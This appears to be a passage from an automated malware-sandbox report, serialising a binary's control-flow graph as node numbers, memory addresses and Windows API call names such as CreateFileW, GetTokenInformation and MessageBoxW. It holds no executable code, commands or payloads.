Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16943->16945 16946 7ff6d925b1f6 16944->16946 16945->16947 16948 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16946->16948 16947->16932 16948->16932 16951 7ff6d925b150 __CxxCallCatchBlock 45 API calls 16950->16951 16952 7ff6d9262659 16951->16952 16959 7ff6d9266d88 16953->16959 16958 7ff6d925f8a9 MultiByteToWideChar 16956->16958 16962 7ff6d9266dec 16959->16962 16960 7ff6d924c550 _log10_special 8 API calls 16961 7ff6d92600bd 16960->16961 16961->16747 16962->16960 16964 7ff6d9250ffd 16963->16964 16965 7ff6d925100f 16963->16965 16966 7ff6d9254f08 _get_daylight 11 API calls 16964->16966 16967 7ff6d925101d 16965->16967 16972 7ff6d9251059 16965->16972 16968 7ff6d9251002 16966->16968 16970 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16967->16970 16969 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 16968->16969 16976 7ff6d925100d 16969->16976 16970->16976 16971 7ff6d92513d5 16974 7ff6d9254f08 _get_daylight 11 API calls 16971->16974 16971->16976 16972->16971 16973 7ff6d9254f08 _get_daylight 11 API calls 16972->16973 16975 7ff6d92513ca 16973->16975 16977 7ff6d9251669 16974->16977 16979 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 16975->16979 16976->16610 16978 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 16977->16978 16978->16976 16979->16971 16981 7ff6d9250704 16980->16981 17008 7ff6d9250464 16981->17008 16983 7ff6d925071d 16983->16145 17020 7ff6d92503bc 16984->17020 16988 7ff6d924c850 16987->16988 16989 7ff6d9242930 GetCurrentProcessId 16988->16989 16990 7ff6d9241c80 49 API calls 16989->16990 16991 7ff6d9242979 16990->16991 17034 7ff6d9254984 16991->17034 16996 7ff6d9241c80 49 API calls 16997 7ff6d92429ff 16996->16997 17064 7ff6d9242620 16997->17064 17000 7ff6d924c550 _log10_special 8 API calls 17001 7ff6d9242a31 17000->17001 17001->16155 17003 7ff6d9241b89 17002->17003 17004 7ff6d9250119 17002->17004 17003->16155 17003->16184 17005 7ff6d9254f08 _get_daylight 11 API calls 17004->17005 17006 7ff6d925011e 17005->17006 17007 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17006->17007 17007->17003 17009 7ff6d92504ce 17008->17009 17010 7ff6d925048e 17008->17010 17009->17010 17012 7ff6d92504da 17009->17012 17011 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17010->17011 17013 7ff6d92504b5 17011->17013 17019 7ff6d925546c EnterCriticalSection 17012->17019 17013->16983 17021 7ff6d92503e6 17020->17021 17032 7ff6d9241a20 17020->17032 17022 7ff6d9250432 17021->17022 17023 7ff6d92503f5 __scrt_get_show_window_mode 17021->17023 17021->17032 17033 7ff6d925546c EnterCriticalSection 17022->17033 17025 7ff6d9254f08 _get_daylight 11 API calls 17023->17025 17027 7ff6d925040a 17025->17027 17029 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17027->17029 17029->17032 17032->16153 17032->16154 17036 7ff6d92549de 17034->17036 17035 7ff6d9254a03 17038 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17035->17038 17036->17035 17037 7ff6d9254a3f 17036->17037 17073 7ff6d9252c10 17037->17073 17040 7ff6d9254a2d 17038->17040 17042 7ff6d924c550 _log10_special 8 API calls 17040->17042 17045 7ff6d92429c3 17042->17045 17043 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17043->17040 17044 7ff6d9254b1c 17044->17043 17052 7ff6d9255160 17045->17052 17046 7ff6d9254b40 17046->17044 17048 7ff6d9254b4a 17046->17048 17047 7ff6d9254af1 17049 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17047->17049 17051 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17048->17051 17049->17040 17050 7ff6d9254ae8 17050->17044 17050->17047 17051->17040 17053 7ff6d925b2c8 _get_daylight 11 API calls 17052->17053 17054 7ff6d9255177 17053->17054 17055 7ff6d925eb98 _get_daylight 11 API calls 17054->17055 17057 7ff6d92551b7 17054->17057 17061 7ff6d92429e5 17054->17061 17056 7ff6d92551ac 17055->17056 17058 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17056->17058 17057->17061 17211 7ff6d925ec20 17057->17211 17058->17057 17061->16996 17062 7ff6d925a900 _isindst 17 API calls 17063 7ff6d92551fc 17062->17063 17065 7ff6d924262f 17064->17065 17066 7ff6d9249390 2 API calls 17065->17066 17067 7ff6d9242660 17066->17067 17068 7ff6d924266f MessageBoxW 17067->17068 17069 7ff6d9242683 MessageBoxA 17067->17069 17070 7ff6d9242690 17068->17070 17069->17070 17071 7ff6d924c550 _log10_special 8 API calls 17070->17071 17072 7ff6d92426a0 17071->17072 17072->17000 17074 7ff6d9252c4e 17073->17074 17075 7ff6d9252c3e 17073->17075 17076 7ff6d9252c57 17074->17076 17080 7ff6d9252c85 17074->17080 17079 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17075->17079 17077 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17076->17077 17078 7ff6d9252c7d 17077->17078 17078->17044 17078->17046 17078->17047 17078->17050 17079->17078 17080->17075 17080->17078 17081 7ff6d92547c0 45 API calls 17080->17081 17083 7ff6d9252f34 17080->17083 17087 7ff6d92535a0 17080->17087 17113 7ff6d9253268 17080->17113 17143 7ff6d9252af0 17080->17143 17081->17080 17085 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17083->17085 17085->17075 17088 7ff6d92535e2 17087->17088 17089 7ff6d9253655 17087->17089 17090 7ff6d92535e8 17088->17090 17091 7ff6d925367f 17088->17091 17092 7ff6d925365a 17089->17092 17093 7ff6d92536af 17089->17093 17098 7ff6d92535ed 17090->17098 17102 7ff6d92536be 17090->17102 17160 7ff6d9251b50 17091->17160 17094 7ff6d925365c 17092->17094 17095 7ff6d925368f 17092->17095 17093->17091 17093->17102 17111 7ff6d9253618 17093->17111 17097 7ff6d92535fd 17094->17097 17101 7ff6d925366b 17094->17101 17167 7ff6d9251740 17095->17167 17112 7ff6d92536ed 17097->17112 17146 7ff6d9253f04 17097->17146 17098->17097 17103 7ff6d9253630 17098->17103 17098->17111 17101->17091 17105 7ff6d9253670 17101->17105 17102->17112 17174 7ff6d9251f60 17102->17174 17103->17112 17156 7ff6d92543c0 17103->17156 17108 7ff6d9254558 37 API calls 17105->17108 17105->17112 17107 7ff6d924c550 _log10_special 8 API calls 17109 7ff6d9253983 17107->17109 17108->17111 17109->17080 17111->17112 17181 7ff6d925e858 17111->17181 17112->17107 17114 7ff6d9253289 17113->17114 17115 7ff6d9253273 17113->17115 17118 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17114->17118 17119 7ff6d92532c7 17114->17119 17116 7ff6d92535e2 17115->17116 17117 7ff6d9253655 17115->17117 17115->17119 17120 7ff6d92535e8 17116->17120 17121 7ff6d925367f 17116->17121 17122 7ff6d925365a 17117->17122 17123 7ff6d92536af 17117->17123 17118->17119 17119->17080 17128 7ff6d92535ed 17120->17128 17131 7ff6d92536be 17120->17131 17126 7ff6d9251b50 38 API calls 17121->17126 17124 7ff6d925365c 17122->17124 17125 7ff6d925368f 17122->17125 17123->17121 17123->17131 17141 7ff6d9253618 17123->17141 17127 7ff6d92535fd 17124->17127 17134 7ff6d925366b 17124->17134 17129 7ff6d9251740 38 API calls 17125->17129 17126->17141 17130 7ff6d9253f04 47 API calls 17127->17130 17142 7ff6d92536ed 17127->17142 17128->17127 17132 7ff6d9253630 17128->17132 17128->17141 17129->17141 17130->17141 17133 7ff6d9251f60 38 API calls 17131->17133 17131->17142 17135 7ff6d92543c0 47 API calls 17132->17135 17132->17142 17133->17141 17134->17121 17136 7ff6d9253670 17134->17136 17135->17141 17138 7ff6d9254558 37 API calls 17136->17138 17136->17142 17137 7ff6d924c550 _log10_special 8 API calls 17139 7ff6d9253983 17137->17139 17138->17141 17139->17080 17140 7ff6d925e858 47 API calls 17140->17141 17141->17140 17141->17142 17142->17137 17194 7ff6d9250d14 17143->17194 17147 7ff6d9253f26 17146->17147 17148 7ff6d9250b80 12 API calls 17147->17148 17149 7ff6d9253f6e 17148->17149 17150 7ff6d925e570 46 API calls 17149->17150 17152 7ff6d9254041 17150->17152 17151 7ff6d9254063 17153 7ff6d92540ec 17151->17153 17155 7ff6d92547c0 45 API calls 17151->17155 17152->17151 17154 7ff6d92547c0 45 API calls 17152->17154 17153->17111 17154->17151 17155->17153 17157 7ff6d9254440 17156->17157 17158 7ff6d92543d8 17156->17158 17157->17111 17158->17157 17159 7ff6d925e858 47 API calls 17158->17159 17159->17157 17161 7ff6d9251b83 17160->17161 17162 7ff6d9251bb2 17161->17162 17164 7ff6d9251c6f 17161->17164 17163 7ff6d9250b80 12 API calls 17162->17163 17166 7ff6d9251bef 17162->17166 17163->17166 17165 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17164->17165 17165->17166 17166->17111 17168 7ff6d9251773 17167->17168 17169 7ff6d92517a2 17168->17169 17171 7ff6d925185f 17168->17171 17170 7ff6d9250b80 12 API calls 17169->17170 17173 7ff6d92517df 17169->17173 17170->17173 17172 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17171->17172 17172->17173 17173->17111 17175 7ff6d9251f93 17174->17175 17176 7ff6d9251fc2 17175->17176 17178 7ff6d925207f 17175->17178 17177 7ff6d9250b80 12 API calls 17176->17177 17180 7ff6d9251fff 17176->17180 17177->17180 17179 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17178->17179 17179->17180 17180->17111 17183 7ff6d925e880 17181->17183 17182 7ff6d925e8c5 17185 7ff6d925e885 __scrt_get_show_window_mode 17182->17185 17187 7ff6d925e8ae __scrt_get_show_window_mode 17182->17187 17191 7ff6d92607e8 17182->17191 17183->17182 17184 7ff6d92547c0 45 API calls 17183->17184 17183->17185 17183->17187 17184->17182 17185->17111 17186 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17186->17185 17187->17185 17187->17186 17193 7ff6d926080c WideCharToMultiByte 17191->17193 17195 7ff6d9250d53 17194->17195 17196 7ff6d9250d41 17194->17196 17199 7ff6d9250d60 17195->17199 17203 7ff6d9250d9d 17195->17203 17197 7ff6d9254f08 _get_daylight 11 API calls 17196->17197 17198 7ff6d9250d46 17197->17198 17201 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17198->17201 17200 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 17199->17200 17209 7ff6d9250d51 17200->17209 17201->17209 17202 7ff6d9250e46 17205 7ff6d9254f08 _get_daylight 11 API calls 17202->17205 17202->17209 17203->17202 17204 7ff6d9254f08 _get_daylight 11 API calls 17203->17204 17206 7ff6d9250e3b 17204->17206 17207 7ff6d9250ef0 17205->17207 17208 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17206->17208 17210 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17207->17210 17208->17202 17209->17080 17210->17209 17212 7ff6d925ec3d 17211->17212 17215 7ff6d92551dd 17212->17215 17216 7ff6d925ec42 17212->17216 17218 7ff6d925ec8c 17212->17218 17213 7ff6d9254f08 _get_daylight 11 API calls 17214 7ff6d925ec4c 17213->17214 17217 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17214->17217 17215->17061 17215->17062 17216->17213 17216->17215 17217->17215 17218->17215 17219 7ff6d9254f08 _get_daylight 11 API calls 17218->17219 17219->17214 17221 7ff6d92485b1 GetTokenInformation 17220->17221 17224 7ff6d9248633 __std_exception_copy 17220->17224 17222 7ff6d92485d2 GetLastError 17221->17222 17223 7ff6d92485dd 17221->17223 17222->17223 17222->17224 17223->17224 17227 7ff6d92485f9 GetTokenInformation 17223->17227 17225 7ff6d924864c 17224->17225 17226 7ff6d9248646 CloseHandle 17224->17226 17225->16202 17226->17225 17227->17224 17228 7ff6d924861c 17227->17228 17228->17224 17229 7ff6d9248626 ConvertSidToStringSidW 17228->17229 17229->17224 17231 7ff6d924c850 17230->17231 17232 7ff6d9242b74 GetCurrentProcessId 17231->17232 17233 7ff6d92426b0 48 API calls 17232->17233 17234 7ff6d9242bc7 17233->17234 17235 7ff6d9254bd8 48 API calls 17234->17235 17236 7ff6d9242c10 MessageBoxW 17235->17236 17237 7ff6d924c550 _log10_special 8 API calls 17236->17237 17238 7ff6d9242c40 17237->17238 17238->16212 17240 7ff6d92425e5 17239->17240 17241 7ff6d9254bd8 48 API calls 17240->17241 17242 7ff6d9242604 17241->17242 17242->16228 17288 7ff6d9258794 17243->17288 17247 7ff6d92481dc 17246->17247 17248 7ff6d9249390 2 API calls 17247->17248 17249 7ff6d92481fb 17248->17249 17250 7ff6d9248216 ExpandEnvironmentStringsW 17249->17250 17251 7ff6d9248203 17249->17251 17252 7ff6d924823c __std_exception_copy 17250->17252 17253 7ff6d9242810 49 API calls 17251->17253 17254 7ff6d9248253 17252->17254 17255 7ff6d9248240 17252->17255 17277 7ff6d924820f __std_exception_copy 17253->17277 17259 7ff6d92482bf 17254->17259 17260 7ff6d9248261 GetDriveTypeW 17254->17260 17256 7ff6d9242810 49 API calls 17255->17256 17256->17277 17257 7ff6d924c550 _log10_special 8 API calls 17277->17257 17329 7ff6d9261558 17288->17329 17388 7ff6d92612d0 17329->17388 17409 7ff6d92602d8 EnterCriticalSection 17388->17409 17536 7ff6d924456a 17535->17536 17537 7ff6d9249390 2 API calls 17536->17537 17538 7ff6d924458f 17537->17538 17539 7ff6d924c550 _log10_special 8 API calls 17538->17539 17540 7ff6d92445b7 17539->17540 17540->16265 17542 7ff6d9247e2e 17541->17542 17543 7ff6d9241c80 49 API calls 17542->17543 17546 7ff6d9247f52 17542->17546 17549 7ff6d9247eb5 17543->17549 17544 7ff6d924c550 _log10_special 8 API calls 17545 7ff6d9247f83 17544->17545 17545->16265 17546->17544 17547 7ff6d9241c80 49 API calls 17547->17549 17548 7ff6d9244560 10 API calls 17548->17549 17549->17546 17549->17547 17549->17548 17550 7ff6d9249390 2 API calls 17549->17550 17551 7ff6d9247f23 CreateDirectoryW 17550->17551 17551->17546 17551->17549 17553 7ff6d9241637 17552->17553 17554 7ff6d9241613 17552->17554 17556 7ff6d92445c0 108 API calls 17553->17556 17675 7ff6d9241050 17554->17675 17558 7ff6d924164b 17556->17558 17557 7ff6d9241618 17561 7ff6d924162e 17557->17561 17564 7ff6d9242710 54 API calls 17557->17564 17559 7ff6d9241653 17558->17559 17560 7ff6d9241682 17558->17560 17562 7ff6d9254f08 _get_daylight 11 API calls 17559->17562 17563 7ff6d92445c0 108 API calls 17560->17563 17561->16265 17565 7ff6d9241658 17562->17565 17566 7ff6d9241696 17563->17566 17564->17561 17567 7ff6d9242910 54 API calls 17565->17567 17568 7ff6d92416b8 17566->17568 17569 7ff6d924169e 17566->17569 17570 7ff6d9241671 17567->17570 17572 7ff6d92506d4 73 API calls 17568->17572 17571 7ff6d9242710 54 API calls 17569->17571 17570->16265 17573 7ff6d92416ae 17571->17573 17574 7ff6d92416cd 17572->17574 17579 7ff6d925004c 74 API calls 17573->17579 17575 7ff6d92416f9 17574->17575 17576 7ff6d92416d1 17574->17576 17601 7ff6d924718b 17600->17601 17603 7ff6d9247144 17600->17603 17601->16265 17603->17601 17743 7ff6d9255024 17603->17743 17605 7ff6d92441a1 17604->17605 17606 7ff6d92444e0 49 API calls 17605->17606 17607 7ff6d92441db 17606->17607 17608 7ff6d92444e0 49 API calls 17607->17608 17609 7ff6d92441eb 17608->17609 17610 7ff6d924420d 17609->17610 17611 7ff6d924423c 17609->17611 17774 7ff6d9244110 17610->17774 17613 7ff6d9244110 51 API calls 17611->17613 17614 7ff6d924423a 17613->17614 17615 7ff6d9244267 17614->17615 17616 7ff6d924429c 17614->17616 17781 7ff6d9247cf0 17615->17781 17617 7ff6d9244110 51 API calls 17616->17617 17620 7ff6d92442c0 17617->17620 17649 7ff6d9241c80 49 API calls 17648->17649 17650 7ff6d9244474 17649->17650 17650->16265 17650->17650 17676 7ff6d92445c0 108 API calls 17675->17676 17677 7ff6d924108c 17676->17677 17678 7ff6d92410a9 17677->17678 17679 7ff6d9241094 17677->17679 17681 7ff6d92506d4 73 API calls 17678->17681 17680 7ff6d9242710 54 API calls 17679->17680 17687 7ff6d92410a4 __std_exception_copy 17680->17687 17682 7ff6d92410bf 17681->17682 17683 7ff6d92410e6 17682->17683 17684 7ff6d92410c3 17682->17684 17689 7ff6d92410f7 17683->17689 17690 7ff6d9241122 17683->17690 17685 7ff6d9254f08 _get_daylight 11 API calls 17684->17685 17686 7ff6d92410c8 17685->17686 17688 7ff6d9242910 54 API calls 17686->17688 17687->17557 17698 7ff6d92410e1 __std_exception_copy 17688->17698 17691 7ff6d9254f08 _get_daylight 11 API calls 17689->17691 17692 7ff6d9241129 17690->17692 17697 7ff6d924113c 17690->17697 17693 7ff6d9241100 17691->17693 17694 7ff6d9241210 92 API calls 17692->17694 17694->17698 17697->17698 17700 7ff6d925039c _fread_nolock 53 API calls 17697->17700 17700->17697 17744 7ff6d925505e 17743->17744 17745 7ff6d9255031 17743->17745 17747 7ff6d9255081 17744->17747 17750 7ff6d925509d 17744->17750 17746 7ff6d9254f08 _get_daylight 11 API calls 17745->17746 17752 7ff6d9254fe8 17745->17752 17748 7ff6d925503b 17746->17748 17749 7ff6d9254f08 _get_daylight 11 API calls 17747->17749 17751 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17748->17751 17753 7ff6d9255086 17749->17753 17758 7ff6d9254f4c 17750->17758 17755 7ff6d9255046 17751->17755 17752->17603 17756 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17753->17756 17755->17603 17757 7ff6d9255091 17756->17757 17757->17603 17759 7ff6d9254f70 17758->17759 17765 7ff6d9254f6b 17758->17765 17760 7ff6d925b150 __CxxCallCatchBlock 45 API calls 17759->17760 17759->17765 17761 7ff6d9254f8b 17760->17761 17766 7ff6d925d984 17761->17766 17765->17757 17767 7ff6d925d999 17766->17767 17768 7ff6d9254fae 17766->17768 17767->17768 17775 7ff6d9244136 17774->17775 17776 7ff6d9254984 49 API calls 17775->17776 17777 7ff6d924415c 17776->17777 17838 7ff6d9255ec8 17837->17838 17839 7ff6d9255eee 17838->17839 17842 7ff6d9255f21 17838->17842 17840 7ff6d9254f08 _get_daylight 11 API calls 17839->17840 17841 7ff6d9255ef3 17840->17841 17843 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17841->17843 17844 7ff6d9255f27 17842->17844 17845 7ff6d9255f34 17842->17845 17855 7ff6d9244616 17843->17855 17846 7ff6d9254f08 _get_daylight 11 API calls 17844->17846 17856 7ff6d925ac28 17845->17856 17846->17855 17855->16290 17869 7ff6d92602d8 EnterCriticalSection 17856->17869 18229 7ff6d92578f8 18228->18229 18232 7ff6d92573d4 18229->18232 18231 7ff6d9257911 18231->16298 18233 7ff6d925741e 18232->18233 18234 7ff6d92573ef 18232->18234 18242 7ff6d925546c EnterCriticalSection 18233->18242 18236 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 18234->18236 18238 7ff6d925740f 18236->18238 18238->18231 18244 7ff6d924fe43 18243->18244 18245 7ff6d924fe71 18243->18245 18246 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 18244->18246 18252 7ff6d924fe63 18245->18252 18253 7ff6d925546c EnterCriticalSection 18245->18253 18246->18252 18252->16304 18255 7ff6d924caf2 RtlLookupFunctionEntry 18254->18255 18256 7ff6d924cb08 RtlVirtualUnwind 18255->18256 18257 7ff6d924c90b 18255->18257 18256->18255 18256->18257 18258 7ff6d924c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18257->18258 18260 7ff6d92445c0 108 API calls 18259->18260 18261 7ff6d9241493 18260->18261 18262 7ff6d92414bc 18261->18262 18263 7ff6d924149b 18261->18263 18265 7ff6d92506d4 73 API calls 18262->18265 18264 7ff6d9242710 54 API calls 18263->18264 18266 7ff6d92414ab 18264->18266 18267 7ff6d92414d1 18265->18267 18266->16346 18268 7ff6d92414f8 18267->18268 18269 7ff6d92414d5 18267->18269 18273 7ff6d9241508 18268->18273 18274 7ff6d9241532 18268->18274 18270 7ff6d9254f08 _get_daylight 11 API calls 18269->18270 18366 7ff6d9246375 18365->18366 18367 7ff6d9241c80 49 API calls 18366->18367 18368 7ff6d92463b1 18367->18368 18369 7ff6d92463dd 18368->18369 18370 7ff6d92463ba 18368->18370 18372 7ff6d9244630 49 API calls 18369->18372 18371 7ff6d9242710 54 API calls 18370->18371 18389 7ff6d92463d3 18371->18389 18373 7ff6d92463f5 18372->18373 18374 7ff6d9246413 18373->18374 18375 7ff6d9242710 54 API calls 18373->18375 18376 7ff6d9244560 10 API calls 18374->18376 18375->18374 18378 7ff6d924641d 18376->18378 18377 7ff6d924c550 _log10_special 8 API calls 18379 7ff6d924336e 18377->18379 18380 7ff6d924642b 18378->18380 18381 7ff6d9248e80 3 API calls 18378->18381 18379->16420 18396 7ff6d9246500 18379->18396 18382 7ff6d9244630 49 API calls 18380->18382 18381->18380 18389->18377 18545 7ff6d9245400 18396->18545 18655 7ff6d925b150 __CxxCallCatchBlock 45 API calls 18654->18655 18657 7ff6d925a3e1 18655->18657 18659 7ff6d925a504 18657->18659 18668 7ff6d9263650 18659->18668 18694 7ff6d9263608 18668->18694 18699 7ff6d92602d8 EnterCriticalSection 18694->18699 18757 7ff6d9255628 18758 7ff6d9255642 18757->18758 18759 7ff6d925565f 18757->18759 18760 7ff6d9254ee8 _fread_nolock 11 API calls 18758->18760 18759->18758 18761 7ff6d9255672 CreateFileW 18759->18761 18762 7ff6d9255647 18760->18762 18763 7ff6d92556dc 18761->18763 18764 7ff6d92556a6 18761->18764 18765 7ff6d9254f08 _get_daylight 11 API calls 18762->18765 18808 7ff6d9255c04 18763->18808 18782 7ff6d925577c GetFileType 18764->18782 18769 7ff6d925564f 18765->18769 18773 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18769->18773 18771 7ff6d92556e5 18776 7ff6d9254e7c _fread_nolock 11 API calls 18771->18776 18772 7ff6d9255710 18829 7ff6d92559c4 18772->18829 18778 7ff6d925565a 18773->18778 18774 7ff6d92556bb CloseHandle 18774->18778 18775 7ff6d92556d1 CloseHandle 18775->18778 18781 7ff6d92556ef 18776->18781 18781->18778 18783 7ff6d92557ca 18782->18783 18784 7ff6d9255887 18782->18784 18787 7ff6d92557f6 GetFileInformationByHandle 18783->18787 18792 7ff6d9255b00 21 API calls 18783->18792 18785 7ff6d925588f 18784->18785 18786 7ff6d92558b1 18784->18786 18788 7ff6d92558a2 GetLastError 18785->18788 18789 7ff6d9255893 18785->18789 18791 7ff6d92558d4 PeekNamedPipe 18786->18791 18806 7ff6d9255872 18786->18806 18787->18788 18790 7ff6d925581f 18787->18790 18795 7ff6d9254e7c _fread_nolock 11 API calls 18788->18795 18793 7ff6d9254f08 _get_daylight 11 API calls 18789->18793 18794 7ff6d92559c4 51 API calls 18790->18794 18791->18806 18796 7ff6d92557e4 18792->18796 18793->18806 18797 7ff6d925582a 18794->18797 18795->18806 18796->18787 18796->18806 18846 7ff6d9255924 18797->18846 18798 7ff6d924c550 _log10_special 8 API calls 18800 7ff6d92556b4 18798->18800 18800->18774 18800->18775 18802 7ff6d9255924 10 API calls 18803 7ff6d9255849 18802->18803 18804 7ff6d9255924 10 API calls 18803->18804 18805 7ff6d925585a 18804->18805 18805->18806 18807 7ff6d9254f08 _get_daylight 11 API calls 18805->18807 18806->18798 18807->18806 18809 7ff6d9255c3a 18808->18809 18810 7ff6d9254f08 _get_daylight 11 API calls 18809->18810 18828 7ff6d9255cd2 __std_exception_copy 18809->18828 18812 7ff6d9255c4c 18810->18812 18811 7ff6d924c550 _log10_special 8 API calls 18813 7ff6d92556e1 18811->18813 18814 7ff6d9254f08 _get_daylight 11 API calls 18812->18814 18813->18771 18813->18772 18815 7ff6d9255c54 18814->18815 18816 7ff6d9257e08 45 API calls 18815->18816 18817 7ff6d9255c69 18816->18817 18818 7ff6d9255c7b 18817->18818 18819 7ff6d9255c71 18817->18819 18820 7ff6d9254f08 _get_daylight 11 API calls 18818->18820 18821 7ff6d9254f08 _get_daylight 11 API calls 18819->18821 18822 7ff6d9255c80 18820->18822 18825 7ff6d9255c76 18821->18825 18823 7ff6d9254f08 _get_daylight 11 API calls 18822->18823 18822->18828 18824 7ff6d9255c8a 18823->18824 18826 7ff6d9257e08 45 API calls 18824->18826 18827 7ff6d9255cc4 GetDriveTypeW 18825->18827 18825->18828 18826->18825 18827->18828 18828->18811 18831 7ff6d92559ec 18829->18831 18830 7ff6d925571d 18839 7ff6d9255b00 18830->18839 18831->18830 18853 7ff6d925f724 18831->18853 18833 7ff6d9255a80 18833->18830 18834 7ff6d925f724 51 API calls 18833->18834 18835 7ff6d9255a93 18834->18835 18835->18830 18836 7ff6d925f724 51 API calls 18835->18836 18837 7ff6d9255aa6 18836->18837 18837->18830 18838 7ff6d925f724 51 API calls 18837->18838 18838->18830 18840 7ff6d9255b1a 18839->18840 18841 7ff6d9255b51 18840->18841 18843 7ff6d9255b2a 18840->18843 18842 7ff6d925f5b8 21 API calls 18841->18842 18844 7ff6d9255b3a 18842->18844 18843->18844 18845 7ff6d9254e7c _fread_nolock 11 API calls 18843->18845 18844->18781 18845->18844 18847 7ff6d925594d FileTimeToSystemTime 18846->18847 18848 7ff6d9255940 18846->18848 18849 7ff6d9255961 SystemTimeToTzSpecificLocalTime 18847->18849 18850 7ff6d9255948 18847->18850 18848->18847 18848->18850 18849->18850 18851 7ff6d924c550 _log10_special 8 API calls 18850->18851 18852 7ff6d9255839 18851->18852 18852->18802 18854 7ff6d925f755 18853->18854 18855 7ff6d925f731 18853->18855 18857 7ff6d925f78f 18854->18857 18860 7ff6d925f7ae 18854->18860 18855->18854 18856 7ff6d925f736 18855->18856 18858 7ff6d9254f08 _get_daylight 11 API calls 18856->18858 18859 7ff6d9254f08 _get_daylight 11 API calls 18857->18859 18861 7ff6d925f73b 18858->18861 18862 7ff6d925f794 18859->18862 18863 7ff6d9254f4c 45 API calls 18860->18863 18864 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18861->18864 18865 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18862->18865 18868 7ff6d925f7bb 18863->18868 18866 7ff6d925f746 18864->18866 18867 7ff6d925f79f 18865->18867 18866->18833 18867->18833 18868->18867 18869 7ff6d92604dc 51 API calls 18868->18869 18869->18868 19104 7ff6d92616b0 19115 7ff6d92673e4 19104->19115 19116 7ff6d92673f1 19115->19116 19117 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19116->19117 19118 7ff6d926740d 19116->19118 19117->19116 19119 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19118->19119 19120 7ff6d92616b9 19118->19120 19119->19118 19121 7ff6d92602d8 EnterCriticalSection 19120->19121 20237 7ff6d925c520 20248 7ff6d92602d8 EnterCriticalSection 20237->20248 18703 7ff6d925f98c 18704 7ff6d925fb7e 18703->18704 18706 7ff6d925f9ce _isindst 18703->18706 18705 7ff6d9254f08 _get_daylight 11 API calls 18704->18705 18723 7ff6d925fb6e 18705->18723 18706->18704 18709 7ff6d925fa4e _isindst 18706->18709 18707 7ff6d924c550 _log10_special 8 API calls 18708 7ff6d925fb99 18707->18708 18724 7ff6d9266194 18709->18724 18714 7ff6d925fbaa 18716 7ff6d925a900 _isindst 17 API calls 18714->18716 18717 7ff6d925fbbe 18716->18717 18721 7ff6d925faab 18721->18723 18748 7ff6d92661d8 18721->18748 18723->18707 18725 7ff6d92661a3 18724->18725 18726 7ff6d925fa6c 18724->18726 18755 7ff6d92602d8 EnterCriticalSection 18725->18755 18730 7ff6d9265598 18726->18730 18731 7ff6d92655a1 18730->18731 18735 7ff6d925fa81 18730->18735 18732 7ff6d9254f08 _get_daylight 11 API calls 18731->18732 18733 7ff6d92655a6 18732->18733 18734 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18733->18734 18734->18735 18735->18714 18736 7ff6d92655c8 18735->18736 18737 7ff6d925fa92 18736->18737 18738 7ff6d92655d1 18736->18738 18737->18714 18742 7ff6d92655f8 18737->18742 18739 7ff6d9254f08 _get_daylight 11 API calls 18738->18739 18740 7ff6d92655d6 18739->18740 18741 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18740->18741 18741->18737 18743 7ff6d9265601 18742->18743 18745 7ff6d925faa3 18742->18745 18744 7ff6d9254f08 _get_daylight 11 API calls 18743->18744 18746 7ff6d9265606 18744->18746 18745->18714 18745->18721 18747 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18746->18747 18747->18745 18756 7ff6d92602d8 EnterCriticalSection 18748->18756 20612 7ff6d9255410 20613 7ff6d925541b 20612->20613 20621 7ff6d925f2a4 20613->20621 20634 7ff6d92602d8 EnterCriticalSection 20621->20634 20635 7ff6d926adfe 20636 7ff6d926ae0d 20635->20636 20637 7ff6d926ae17 20635->20637 20639 7ff6d9260338 LeaveCriticalSection 20636->20639

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF6D92489E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
